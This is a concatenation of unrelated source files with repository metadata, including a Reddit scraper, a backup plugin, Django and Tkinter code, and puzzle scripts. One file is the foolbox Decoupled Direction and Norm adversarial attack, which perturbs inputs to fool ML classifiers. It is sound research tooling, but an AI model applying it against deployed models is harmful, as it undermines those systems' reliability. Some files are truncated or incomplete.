def get_worthwhile_posts():
    """Scan the newest 500 /r/WritingPrompts posts and return promising ones.

    A post qualifies when it is under a day old, has score >= 4, averages
    better than one point per hour, and has at most one comment.  Returns a
    list of dicts with 'title', 'score' and 'elapsed' (whole hours).
    """
    reddit.read_only = True
    rWP = reddit.subreddit('WritingPrompts')
    posts = []
    for submission in rWP.new(limit=500):
        timestamp = submission.created
        # +28800 (8 h) shifts the API creation time -- presumably a timezone
        # correction for submission.created; TODO confirm the offset.
        elapsed = int(current - timestamp + 28800)
        score = submission.score
        # elapsed/score < 3600 means fewer than 3600 s per point, i.e. better
        # than one upvote per hour on average.
        if (elapsed < 86400) and (score >= 4) and (elapsed/score < 3600) and (submission.num_comments <= 1):
            posts.append({'title':submission.title,'score':score,'elapsed':elapsed//3600})
    return posts
|
[
"cstuartroe@haverford.edu"
] |
cstuartroe@haverford.edu
|
fc216362a02225b2ff41c9073d1ca8277c088188
|
37c3b81ad127c9e3cc26fa9168fda82460ca9bda
|
/Baekjoon/boj_10711_모래성.py
|
3f23b08f4cb51446ea056e929f61c0ec51f93fab
|
[] |
no_license
|
potomatoo/TIL
|
5d85b69fdaed68966db7cfe2a565b7c64ed3e816
|
395dc190fa13e5ed036e1e3c7d9e0bc2e1ee4d6c
|
refs/heads/master
| 2021-07-08T16:19:40.410097
| 2021-04-19T02:33:40
| 2021-04-19T02:33:40
| 238,872,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 700
|
py
|
# Read an N-row, M-column grid; digits are sandcastle tower heights, '.' is
# water, '9' appears to be treated as a fixed/ignored cell -- TODO confirm.
N, M = map(int,input().split())
castle = [list(map(str,[*input()])) for _ in range(N)]
search = []
# First pass: convert tower cells to ints and queue them as (y, x, 0, 0).
for y in range(N):
    for x in range(M):
        if castle[y][x] != '.' and castle[y][x] != '9':
            castle[y][x] = int(castle[y][x])
            search.append((y, x, 0, 0))
# 8-direction offsets; only the first 4 (orthogonal) are used below.
dy = [-1, 1, 0, 0, -1, -1, 1, 1]
dx = [0, 0, -1, 1, -1, 1, 1, -1]
# Second pass: for each tower cell, look at orthogonal neighbours in bounds.
for y in range(N):
    for x in range(M):
        if castle[y][x] != '.' and castle[y][x] != '9':
            for i in range(4):
                ty = y + dy[i]
                tx = x + dx[i]
                if ty < 0 or tx < 0 or ty > N-1 or tx > M-1:
                    continue
                if castle[ty][tx] == '.':
                    # NOTE(review): the file appears truncated here -- the bare
                    # 'search' below is a no-op expression; the logic that
                    # consumes the queue is missing.
                    search
|
[
"duseh73@gmail.com"
] |
duseh73@gmail.com
|
602534b2b5640835f91753fe88773c67f8116f05
|
7da6ecf172b3e9354d93ddfe06f87b930fad90b3
|
/pickup/generator_profile/folder.py
|
8b6f79f8d7e9a8b25b0989cacbb483ad3f55c10e
|
[] |
no_license
|
exhuma/pickup
|
05f8d271de95d76b337a6994dcd21799fe0e4b34
|
688b05d0ae1276dcc386b45c8ddb1cea71b15cb1
|
refs/heads/master
| 2016-09-06T01:21:08.343607
| 2011-07-15T15:09:10
| 2011-07-15T15:09:10
| 1,059,260
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,683
|
py
|
"""
The folder plugin create a bzipped tar file for a specific folder. It is also
possible to specify a parent folder and create individual tarballs for each
folder and one for files beneath that folder.
Configuration
~~~~~~~~~~~~~
The following fields are used by this plugin:
**path** (string)
The folder
**split** (boolean) *optional*
If set to "True", this module will create individual tarballs (Default =
False).
Configuration Example
~~~~~~~~~~~~~~~~~~~~~
.. code-block:: python
dict(
name = 'My home folder',
profile = 'folder',
config = dict(
path = '/home/me',
split = True,
)
),
"""
import logging
import tarfile
import re
from os.path import exists, join, abspath, isdir
import os
LOG = logging.getLogger(__name__)
API_VERSION = (2,0)
CONFIG = {}
SOURCE = {}
def init(source):
    """Remember the profile definition for later `run` calls.

    Copies the profile's ``config`` mapping into the module-level CONFIG
    dict and the full profile into SOURCE.  When ``split`` is set in the
    config, one tarball per sub-folder is created later.
    """
    profile_config = source['config']
    CONFIG.update(profile_config)
    SOURCE.update(source)
    LOG.debug("Initialised '%s' with %r" % ( __name__, CONFIG))
def run(staging_area):
    """Create the backup tarball(s) for the configured path in *staging_area*."""
    path = CONFIG['path']
    if not exists(path):
        LOG.error("Path '%s' does not exist! Skipping!" % path)
        return
    # 'split' selects one-tarball-per-subfolder mode; default is one archive.
    strategy = create_split_tar if CONFIG.get("split", False) else create_simple_tar
    strategy(staging_area)
def create_split_tar(staging_area):
    """
    Creates one tar file for each folder found in CONFIG['path']. If normal
    files reside in that folder, they will be collected into a special tarfile
    named "__PICKUP_FILES__.tar.bz2"
    @param staging_area: The target folder
    """
    if not isdir(CONFIG['path']):
        LOG.error("Impossible to create a split tar! %s is not a folder!" % CONFIG['path'])
        return
    LOG.info("Creating tarball for each folder inside %s" % CONFIG['path'])
    # Make sure the staging area exists and really is a directory.
    if not exists(staging_area):
        os.makedirs( staging_area )
    elif not isdir(staging_area):
        LOG.error("'%s' exists and is not a folder! Skipping" % staging_area)
        return
    files = []
    for entry in os.listdir(CONFIG['path']):
        entrypath = join(CONFIG['path'], entry)
        # Add directories directly, and add normal files into a special filename
        if not isdir(entrypath):
            files.append(entrypath)
            continue
        # One <subfolder>.tar.bz2 per directory entry.
        tarname = join(staging_area, "%s.tar.bz2" % entry)
        LOG.info("Writing to '%s'" % abspath(tarname))
        tar = tarfile.open(abspath(tarname), "w:bz2")
        tar.add(entrypath)
        tar.close()
    # Loose files collected during the walk go into one catch-all archive.
    if files:
        tarname = join(staging_area, "__PICKUP_FILES__.tar.bz2")
        LOG.info("Writing remaining files to '%s'" % abspath(tarname))
        tar = tarfile.open(abspath(tarname), "w:bz2")
        for file in files:
            LOG.info(" Adding %s" % file)
            tar.add(file)
        tar.close()
def get_basename():
    """Return a filesystem-safe, non-clashing base name for this source.

    Non-alphanumeric characters in the profile name are replaced with
    underscores, then a numeric suffix is appended while the candidate
    already exists in the current working directory.
    """
    # replace non-ascii characters with underscores
    stem = re.sub( r'[^a-zA-Z0-9]', "_", SOURCE['name'] )
    # now remove all leading/trainling underscores
    stem = stem.strip("_")
    # prevent accidental overwrites
    basename = stem
    counter = 0
    while exists(basename):
        counter += 1
        LOG.debug( "File %s exists. Adding a counter." % basename )
        # Bug fix: suffix the original stem each round ("name-2"), instead of
        # compounding onto the previous candidate ("name-1-2").
        basename = "%s-%d" % (stem, counter)
    return basename
def create_simple_tar(staging_area):
    """Archive CONFIG['path'] into a single <basename>.tar.bz2 in *staging_area*."""
    LOG.info("Creating tarball for path %s" % CONFIG['path'])
    tarname = "%s.tar.bz2" % get_basename()
    # put it into the staging area
    tarname = join(staging_area, tarname)
    LOG.info("Writing to '%s'" % abspath(tarname))
    tar = tarfile.open(abspath(tarname), "w:bz2")
    tar.add( CONFIG['path'] )
    tar.close()
|
[
"michel@albert.lu"
] |
michel@albert.lu
|
4146e50a8525f3747cb0dca5aef9030f0519f149
|
295f34f4411d984f0ff6026be6e96fe134dc1550
|
/home/pi/antes/consulta.py
|
92d50b55d536b5cbe4a174bb77c1f2614a735a08
|
[] |
no_license
|
mcashjavier/disco-linux-raspy
|
1e3fed914b6040fa9972e7cfc7357ecb72070e8c
|
8c23103cf089059fbdadfad8cfb7059c1580da83
|
refs/heads/master
| 2022-12-20T17:06:39.967203
| 2019-03-12T12:09:22
| 2019-03-12T20:01:10
| 175,072,541
| 0
| 3
| null | 2022-12-18T06:59:27
| 2019-03-11T19:44:12
| null |
UTF-8
|
Python
| false
| false
| 2,093
|
py
|
from tkinter import *
import socket
import sys


def Salir():
    """Close the main window and end the application."""
    ventana.destroy()


def MiSaldo():
    """Query the balance server for the card number typed into `tarjeta`.

    Sends 'C' + card number over TCP and shows the reply in the `Saldo`
    label.  `tarjeta`, `Saldo` and `ventana` are module-level widgets
    created below.
    """
    if tarjeta.get():
        # Create a TCP/IP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Connect the socket to the port where the server is listening.
        # NOTE(review): connect() is outside the try/finally, so a failed
        # connection raises before the socket is ever closed.
        server_address = ('181.164.238.87', 123)
        print('connecting to %s port %s' % server_address)
        sock.connect(server_address)
        try:
            # Send data. 'C' looks like the balance-query opcode; the older
            # sample ('C;1921000005618') shows a ';' separator this code does
            # not send -- TODO confirm the server accepts both forms.
            message = 'C' + tarjeta.get() #'C;1921000005618'
            print('sending "%s"' % message)
            sock.send(message.encode())
            # Look for the response; loop until at least one byte arrives.
            amount_received = 0
            amount_expected = 1#len(message)
            while amount_received < amount_expected:
                data = sock.recv(100)
                amount_received += len(data)
                print('received "%s"' % data.decode())
                # Show the raw server reply in the balance label.
                Saldo.config(text = data.decode())
        finally:
            print('closing socket')
            sock.close()
    else:
        Saldo.config(text = 'Escribi algo antes de mandar!!! *-*')


# --- UI setup: full-screen black window with an entry, a balance label and
# two buttons (query / exit). ---
ventana = Tk()
ventana.attributes("-fullscreen", True)
ventana.configure(background='black')
#ventana.geometry("600x300+0+0")
ventana.title("Consulta de Saldo")
tarjeta = Entry(ventana, text = "-",justify='center',fg="white", font=("Helvetica", 14),background='black')
tarjeta.place(x = (ventana.winfo_screenwidth())/2-(ventana.winfo_screenwidth()/2), y = 140,width=ventana.winfo_screenwidth())
Saldo = Label(ventana, text = "-",fg="green", font=("Helvetica", 16),background='black')
Saldo.place(x = (ventana.winfo_screenwidth())/2-(ventana.winfo_screenwidth()/2), y = 160,width=ventana.winfo_screenwidth())
btn_estado = Button(ventana, text = "Consultar Saldo", command = MiSaldo,)
btn_estado.place(x = (ventana.winfo_screenwidth())/2-100, y = 100,width=200)
bsalir = Button(ventana, text = "Salir", command = Salir)
bsalir.place(x = (ventana.winfo_screenwidth())/2-100, y = 200,width=200)
ventana.mainloop()
|
[
"prog2@magneticash.com"
] |
prog2@magneticash.com
|
6e785160cfd23b23fd62580b0dd68b6ef5ba14f8
|
212daad1c33e796944fff2ca41788b872f6e6a0e
|
/plane_shotting/settings.py
|
522e673cca183d9cda49aedf39e87315251c4015
|
[] |
no_license
|
walter0909/python_scripts
|
ecae13b8931f791d241b8902a76629683e2fdccd
|
19156358ced7b8cc0107d390e74203ca5b320cb5
|
refs/heads/master
| 2023-02-25T12:53:53.795302
| 2021-02-03T06:07:28
| 2021-02-03T06:07:28
| 297,516,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
class Settings():
    """Runtime configuration values for the plane-shooting game."""

    def __init__(self):
        # Screen geometry and background colour.
        self.screen_width, self.screen_height = 800, 600
        self.bg_color = (230, 230, 230)
        # Ship movement speed (pixels per update tick).
        self.ship_speed_factor = 1.5
        # Bullet behaviour: speed, size, colour and on-screen cap.
        self.bullet_speed_factor = 1
        self.bullet_width, self.bullet_height = 3, 15
        self.bullet_color = (60, 60, 60)
        self.bullets_allowed = 3
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
529f4017618780f8663e90680936300e7bd47b4b
|
be7949a09fa8526299b42c4c27adbe72d59d2201
|
/cnns/foolbox/foolbox_2_3_0/v1/attacks/decoupled_direction_norm.py
|
ba84884374e569e8613766c56669d5399a107841
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
adam-dziedzic/bandlimited-cnns
|
375b5cccc7ab0f23d2fbdec4dead3bf81019f0b4
|
81aaa27f1dd9ea3d7d62b661dac40cac6c1ef77a
|
refs/heads/master
| 2022-11-25T05:40:55.044920
| 2020-06-07T16:14:34
| 2020-06-07T16:14:34
| 125,884,603
| 17
| 5
|
Apache-2.0
| 2022-11-21T21:01:46
| 2018-03-19T16:02:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,263
|
py
|
import math
import numpy as np
import logging
from .base import Attack
from .base import call_decorator
class DecoupledDirectionNormL2Attack(Attack):
    """The Decoupled Direction and Norm L2 adversarial attack from [1]_.

    References
    ----------
    .. [1] Jérôme Rony, Luiz G. Hafemann, Luiz S. Oliveira, Ismail Ben Ayed,
    Robert Sabourin, Eric Granger, "Decoupling Direction and Norm for Efficient
    Gradient-Based L2 Adversarial Attacks and Defenses",
    https://arxiv.org/abs/1811.09600
    """
    @call_decorator
    def __call__(
        self,
        input_or_adv,
        label=None,
        unpack=True,
        steps=100,
        gamma=0.05,
        initial_norm=1,
        quantize=True,
        levels=256,
    ):
        """The Decoupled Direction and Norm L2 adversarial attack.

        Parameters
        ----------
        input_or_adv : `numpy.ndarray` or :class:`Adversarial`
            The original, unperturbed input as a `numpy.ndarray` or
            an :class:`Adversarial` instance.
        label : int
            The reference label of the original input. Must be passed
            if `a` is a `numpy.ndarray`, must not be passed if `a` is
            an :class:`Adversarial` instance.
        unpack : bool
            If true, returns the adversarial input, otherwise returns
            the Adversarial object.
        steps : int
            Number of steps for the optimization.
        gamma : float, optional
            Factor by which the norm will be modified.
            new_norm = norm * (1 + or - gamma).
        initial_norm : float, optional
            Initial value for the norm.
        quantize : bool, optional
            If True, the returned adversarials will have quantized values to
            the specified number of levels.
        levels : int, optional
            Number of levels to use for quantization
            (e.g. 256 for 8 bit images).
        """
        a = input_or_adv
        if not a.has_gradient():
            logging.fatal(
                "Applied gradient-based attack to model that "
                "does not provide gradients."
            )
            return
        # s scales unit-norm gradients to the model's input value range.
        min_, max_ = a.bounds()
        s = max_ - min_
        # Targeted attacks step with the negated gradient (toward the target
        # class); untargeted attacks step with the gradient (away from the
        # original class).
        if a.target_class is not None:
            multiplier = -1
            attack_class = a.target_class
        else:
            multiplier = 1
            attack_class = a.original_class
        norm = initial_norm
        unperturbed = a.unperturbed
        perturbation = np.zeros_like(unperturbed)
        for i in range(steps):
            logits, grad, is_adv = a.forward_and_gradient_one(
                unperturbed + perturbation, attack_class, strict=True
            )
            # renorm gradient and handle 0-norm gradient
            grad_norm = np.linalg.norm(grad)
            if grad_norm == 0:  # pragma: no cover
                grad = np.random.normal(size=grad.shape)
                grad_norm = np.linalg.norm(grad)
            grad *= s / grad_norm
            # update perturbation along the (de)scent direction with a
            # cosine-annealed step size.
            lr = cosine_learning_rate(i, steps, 1.0, 0.01)
            perturbation += lr * multiplier * grad
            # update norm value and renorm perturbation accordingly:
            # shrink the norm when already adversarial, grow it otherwise.
            norm *= 1 - (2 * is_adv - 1) * gamma
            perturbation *= s * norm / np.linalg.norm(perturbation)
        # Snap the perturbation to the input's discrete value grid
        # (e.g. 1/255 steps for 8-bit images).
        if quantize:
            perturbation = (perturbation - min_) / s
            perturbation = np.round(perturbation * (levels - 1))
            perturbation /= levels - 1
            perturbation = perturbation * s + min_
        # NOTE(review): this final quantized/clipped perturbation is not fed
        # through forward_and_gradient_one again; adversarials appear to be
        # recorded on `a` during the loop -- confirm the last clip is
        # intentional and not a dropped evaluation.
        perturbation = np.clip(perturbation, min_ - unperturbed, max_ - unperturbed)
def cosine_learning_rate(current_step, max_steps, init_lr, final_lr):
    """Cosine annealing schedule for the learning rate.

    Smoothly interpolates from *init_lr* (at step 0) down to *final_lr*
    (at *max_steps*) along half a cosine wave.

    Parameters
    ----------
    current_step : int
        Current step in the optimization.
    max_steps : int
        Total number of steps of the optimization.
    init_lr : float
        Initial learning rate.
    final_lr : float
        Final learning rate.

    Returns
    -------
    float
        The current learning rate.
    """
    # weight decays 1 -> 0 as current_step goes 0 -> max_steps
    weight = (1 + math.cos(math.pi * current_step / max_steps)) / 2
    return final_lr + weight * (init_lr - final_lr)
|
[
"adam.dziedzi@gmail.com"
] |
adam.dziedzi@gmail.com
|
732590f7535f493bc8add88cca06fc797937dc05
|
2874b52c0234d7e71031d4c22dedb3b24e539b2c
|
/backend/asetbeta_23682/wsgi.py
|
2ec019498b29468afbec180a22811cd744c8072d
|
[] |
no_license
|
crowdbotics-apps/asetbeta-23682
|
d81ed8125b8c2ebb12b43d25d8068ff9ca71e344
|
128708fff3c98680a239a0f198aed5937950c5bf
|
refs/heads/master
| 2023-02-12T09:51:04.507332
| 2021-01-14T14:38:53
| 2021-01-14T14:38:53
| 327,014,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
"""
WSGI config for asetbeta_23682 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# The settings module must be configured before the application is created.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "asetbeta_23682.settings")
# WSGI servers import this module and look up ``application``.
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
55a35f079b434c08a95524dea40c0fc2846bb651
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2586/50263/236178.py
|
bd5fcad9a1a5d3b23ec8f4ae01903de54d954987
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
# SECURITY(review): eval(input()) executes arbitrary expressions; int(input())
# would be safer if the inputs are plain integers -- TODO confirm the judge's
# input format before changing.
a = eval(input())
b = eval(input())
c = eval(input())
s = []
# Gaps between the first/middle and middle/last positions.
d1 = abs(b-a)
d2 = abs(c-b)
min_move = 0
# Maximum moves: every interior cell of both gaps, one step at a time.
max_move = d1+d2-2
if max_move != 0:
    # Minimum moves: one jump suffices if either gap is small (< 3), else two.
    if min(d1,d2) < 3:
        min_move = 1
    else:
        min_move = 2
s.append(min_move)
s.append(max_move)
print(s)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
4ef5375f46be6cb5c3ceb6cb0a70c7c7fcbb357c
|
b08870f8fe7b3cf1bbab3c52a7bacbb36ee1dcc6
|
/verp/patches/v13_0/update_custom_fields_for_shopify.py
|
40343f14221e3519c8ebba2228a7bb47f7871451
|
[] |
no_license
|
vsadminpk18/verpfinalversion
|
7148a64fe6134e2a6371470aceb1b57cc4b5a559
|
93d164b370ad9ca0dd5cda0053082dc3abbd20da
|
refs/heads/master
| 2023-07-13T04:11:59.211046
| 2021-08-27T06:26:48
| 2021-08-27T06:26:48
| 400,410,611
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
# Copyright (c) 2020, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from verp.verp_integrations.doctype.shopify_settings.shopify_settings import setup_custom_fields
def execute():
    # Patch entry point: (re)create the Shopify custom fields, but only when
    # the Shopify integration is enabled on this site.
    if frappe.db.get_single_value('Shopify Settings', 'enable_shopify'):
        setup_custom_fields()
|
[
"admin@vespersolutions.tech"
] |
admin@vespersolutions.tech
|
8ee947a3381a57c428c551203de2c68479f20251
|
3c2eefd083f9b65ce7900ece4d9670b1130d65de
|
/bin/jwst_mtvt
|
f4721bd5bb4a607f58ea2c7fcf3b5246e11c8b8e
|
[] |
no_license
|
wkerzendorf/jwst_gtvt
|
ef1896fcee2f292715b36ec1a48c39b000098e48
|
55ee820d978858cbd6065c275d70680868916f58
|
refs/heads/master
| 2021-04-27T18:31:47.858747
| 2017-12-11T16:13:48
| 2017-12-11T16:13:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,613
|
#!/usr/bin/env python
import argparse
import sys
from jwst_gtvt.find_tgt_info import main, get_target_ephemeris
if __name__ == '__main__':
    # CLI entry point: resolve a moving (Solar System) target's ephemeris over
    # the requested date range, then delegate to the generic visibility tool.
    parser = argparse.ArgumentParser(description='')
    parser.add_argument('desg', nargs='+', help='Moving target designation.')
    parser.add_argument('--smallbody', action='store_true', help='Set if the designation is that of a comet or asteroid. This is required for periodic comets with multiple orbit solutions in JPL/HORIZONS.')
    parser.add_argument('--v3pa', help='Specify a desired V3 (telescope frame) Position Angle.')
    parser.add_argument('--save_plot', help='Path of file to save plot output.')
    parser.add_argument('--save_table', help='Path of file to save table output.')
    parser.add_argument('--instrument', help='If specified plot shows only windows for this instrument. Options: nircam, nirspec, niriss, miri, fgs, v3 (case insensitive).')
    parser.add_argument('--name', help='Target Name to appear on plots. Names with space should use double quotes e.g. "NGC 6240".')
    parser.add_argument('--start_date', default='2018-01-01', help='Start date for visibility search in yyyy-mm-dd format. Earliest available is 2018-01-01.')
    parser.add_argument('--end_date', default='2021-12-31', help='End date for visibility search in yyyy-mm-dd format. Latest available is 2021-12-31.')
    args = parser.parse_args()
    # get_target_ephemeris returns (name, ra, dec); ra/dec are grafted onto
    # the argparse namespace because main() reads them from there.
    name, args.ra, args.dec = get_target_ephemeris(
        ' '.join(args.desg), args.start_date, args.end_date, smallbody=args.smallbody)
    if args.name is None:
        args.name = name
    # fixed=False signals a moving target to the shared main().
    main(args, fixed=False)
|
[
"msk@astro.umd.edu"
] |
msk@astro.umd.edu
|
|
5a3af79325cecdb45f242a8ef34e72960f0eab7d
|
74ba13d19d6adb22149dbb8b17c0f4f1385ecfcb
|
/src/packet_factory.py
|
a8cbc3435b4d71956d4707aa482a5b5f794a5f04
|
[
"MIT"
] |
permissive
|
aenon/Melkweg
|
2d6e7a2d6cd29c0bc9e246b65c0d042d9c73ad13
|
d3adcc615ede1fad116c9c50ed0609a6b1a55250
|
refs/heads/master
| 2021-05-07T08:20:16.005318
| 2017-11-02T16:46:34
| 2017-11-02T16:46:34
| 108,594,644
| 0
| 0
| null | 2017-10-27T20:53:01
| 2017-10-27T20:53:01
| null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
#coding=utf-8
from packet_pb2 import MPacket
from cipher import nonce
class PacketFlag(object):
    """Packet type codes carried in ``MPacket.flags``."""
    DATA = 1  # payload-bearing packet (set by create_data_packet)
    LIV = 2   # not used by PacketFactory below -- presumably a keep-alive; TODO confirm
    RST = 3   # per-port stream reset (set by create_rst_packet)
    FIN = 4   # per-port stream close (set by create_fin_packet)
    KILL = 5  # connection-wide shutdown; create_kill_packet sets no port
class PacketFactory(object):
    """Factory helpers that build protobuf ``MPacket`` messages.

    Each helper returns a fresh MPacket with the relevant fields
    (``flags``, ``port``, ``data``, ``iv``) populated; interpretation of
    the flag values is shared with the peer (see PacketFlag).
    """

    # Idiom fix throughout: the first parameter of a @classmethod is
    # conventionally named ``cls``, not ``self`` (callers are unaffected).

    @classmethod
    def create_syn_packet(cls, iv):
        """Return an MPacket carrying only the cipher ``iv``."""
        packet = MPacket()
        packet.iv = iv
        return packet

    @classmethod
    def create_rst_packet(cls, port):
        """Return an RST-flagged MPacket for *port*."""
        packet = MPacket()
        packet.port = port
        packet.flags = PacketFlag.RST
        return packet

    @classmethod
    def create_kill_packet(cls):
        """Return a KILL-flagged MPacket (no port set)."""
        packet = MPacket()
        packet.flags = PacketFlag.KILL
        return packet

    @classmethod
    def create_data_packet(cls, port, data):
        """Return a DATA-flagged MPacket delivering *data* for *port*."""
        packet = MPacket()
        packet.flags = PacketFlag.DATA
        packet.port = port
        packet.data = data
        return packet

    @classmethod
    def create_fin_packet(cls, port):
        """Return a FIN-flagged MPacket for *port*."""
        packet = MPacket()
        packet.flags = PacketFlag.FIN
        packet.port = port
        return packet
|
[
"mail.kuuy@gmail.com"
] |
mail.kuuy@gmail.com
|
b4d2b444b5df8f4145c1988f40a94af4842b1109
|
d02c92f1fc6910b1a9c5e6823e689b32567e41a6
|
/practica_2/polls_proj/polls_app/serializers.py
|
42363486667c10bb144a77c72a2eafa87cddeed8
|
[] |
no_license
|
eflipe/Django-REST
|
6c1050bf9f46e88a7639d103a629f96d59a797bf
|
110072f282e8fe9852e8bf6ae6e5660aa0e80d64
|
refs/heads/master
| 2023-08-05T11:58:41.691221
| 2020-08-05T23:23:34
| 2020-08-05T23:23:34
| 282,772,802
| 0
| 0
| null | 2023-07-24T00:26:28
| 2020-07-27T02:15:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,152
|
py
|
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import Poll, Choice, Vote
from rest_framework.authtoken.models import Token
class UserSerializer(serializers.ModelSerializer):
    """Registration serializer; hashes the password and issues an auth token."""
    class Meta:
        model = User
        fields = ('username', 'email', 'password')
        # Never echo the password back in API responses.
        extra_kwargs = {'password': {'write_only': True}}
    def create(self, validated_data):
        user = User(
            email=validated_data['email'],
            username=validated_data['username']
        )
        # set_password() hashes; assigning the field directly would store
        # the plain text.
        user.set_password(validated_data['password'])
        user.save()
        # One DRF token per new user, created eagerly at registration.
        Token.objects.create(user=user)
        return user
class VoteSerializer(serializers.ModelSerializer):
    """Plain serializer exposing every Vote field."""
    class Meta:
        model = Vote
        fields = '__all__'
class ChoiceSerializer(serializers.ModelSerializer):
    """Choice serializer with its votes nested (optional on input)."""
    votes = VoteSerializer(many=True, required=False)
    class Meta:
        model = Choice
        fields = '__all__'
class PollSerializer(serializers.ModelSerializer):
    """Poll serializer with read-only nested choices."""
    choices = ChoiceSerializer(many=True, read_only=True, required=False)
    class Meta:
        model = Poll
        fields = '__all__'
|
[
"felipecabaleiro@gmail.com"
] |
felipecabaleiro@gmail.com
|
95c0226e3f29a6fd7317200273f0e0fb0a7695ca
|
f642c054451aa3c87bb18fa63037eea0e6358bda
|
/algo/longestStringInArray_CanBeMadeFromotherStrings.py
|
33d9cb3ae354d688e4da4d8c1b61436bc258fc5d
|
[] |
no_license
|
devendraprasad1984/python
|
30f3a539e92be13d893246ad28a42907457a38d5
|
0f1badabba07fbe7f5f792b7e543c0748eecd6c7
|
refs/heads/master
| 2023-07-21T08:22:45.193077
| 2021-08-27T15:09:28
| 2021-08-27T15:09:28
| 254,812,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
"""
"""
arr=["geeks","for","geeksgeeks","geeksfor","geeksforgeeks"]
maxStr=sorted(arr,key=lambda x:-len(x))[0]
print(arr,maxStr)
found=False
for x in arr:
for y in arr:
if maxStr!=x and maxStr!=y:
# print(x+y)
if x+y==maxStr:
found=True
print("max string",maxStr,"is possible to built from parts of arrays",x,y)
break
if not found:
print("max string",maxStr,"is not possible to built from parts of arrays")
|
[
"devendraprasad1984@gmail.com"
] |
devendraprasad1984@gmail.com
|
7537b54bab44dc8f46b1c1c38c0d6b02d131616e
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/public_hand_or_big_woman.py
|
a6465a3098d82b969e3ffb571a87aeeb368e3bf7
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
#! /usr/bin/env python

def week(str_arg):
    """Echo *str_arg* to stdout."""
    print(str_arg)


def be_next_work(str_arg):
    """Print *str_arg*, then the literal marker 'woman_or_time'."""
    week(str_arg)
    print('woman_or_time')


if __name__ == '__main__':
    be_next_work('year')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
958d10213b2c05b768ced6c6cda03fb7c7d10b0b
|
bdc10ba57424040129cc72ad018ff26bc8bca66a
|
/ConfigDefinitions/BranchAdditions/UserDefinedBranches/Triggers_18_MC.py
|
fa59a97a8c09e3b16d9403906e1fd565dd4e9943
|
[] |
no_license
|
aloeliger/Jesterworks
|
61e0ac38ca325fefbbd8ccedaa8eb02d8a76ebbe
|
96a22bac4ce20b91aba5884eb0e5667fcea3bc9a
|
refs/heads/master
| 2021-06-09T15:39:06.976110
| 2021-04-23T11:25:06
| 2021-04-23T11:25:06
| 157,698,363
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,383
|
py
|
import ConfigDefinitions.BranchAdditions.BranchDef as Branch
def CalculateTrigger24(TheBranch,TheChain):
    """Set BranchValue[0] to 1.0 when the chain passes, matches and filters
    the Mu24 trigger with pt_1 > 25.0; otherwise 0.0."""
    passed = (TheChain.passMu24 and TheChain.matchMu24_1
              and TheChain.filterMu24_1 and TheChain.pt_1 > 25.0)
    TheBranch.BranchValue[0] = 1.0 if passed else 0.0
def CalculateTrigger27(TheBranch,TheChain):
    """Set BranchValue[0] to 1.0 when the chain passes, matches and filters
    the Mu27 trigger with pt_1 > 25.0; otherwise 0.0."""
    passed = (TheChain.passMu27 and TheChain.matchMu27_1
              and TheChain.filterMu27_1 and TheChain.pt_1 > 25.0)
    TheBranch.BranchValue[0] = 1.0 if passed else 0.0
def CalculateTrigger2027(TheBranch,TheChain):
    """Set BranchValue[0] to 1.0 when the Mu20/HPSTau27 cross-trigger
    selection passes; otherwise 0.0.

    Requires pass + match + filter flags on both legs, 21 < pt_1 < 25,
    pt_2 > 32, and |eta| < 2.1 for both legs.
    """
    passed = (TheChain.passMu20HPSTau27
              and TheChain.matchMu20HPSTau27_1
              and TheChain.matchMu20HPSTau27_2
              and 21 < TheChain.pt_1 < 25
              and TheChain.pt_2 > 32
              and abs(TheChain.eta_1) < 2.1
              and abs(TheChain.eta_2) < 2.1
              and TheChain.filterMu20HPSTau27_1
              and TheChain.filterMu20HPSTau27_2)
    TheBranch.BranchValue[0] = 1.0 if passed else 0.0
# Module-level UserBranch instances: each binds an output-branch name to its
# calculator function so configs can reference the branches by name.
Trigger24 = Branch.UserBranch()
Trigger24.Name = "Trigger24"
Trigger24.CalculateValue = CalculateTrigger24
Trigger27 = Branch.UserBranch()
Trigger27.Name = "Trigger27"
Trigger27.CalculateValue = CalculateTrigger27
Trigger2027 = Branch.UserBranch()
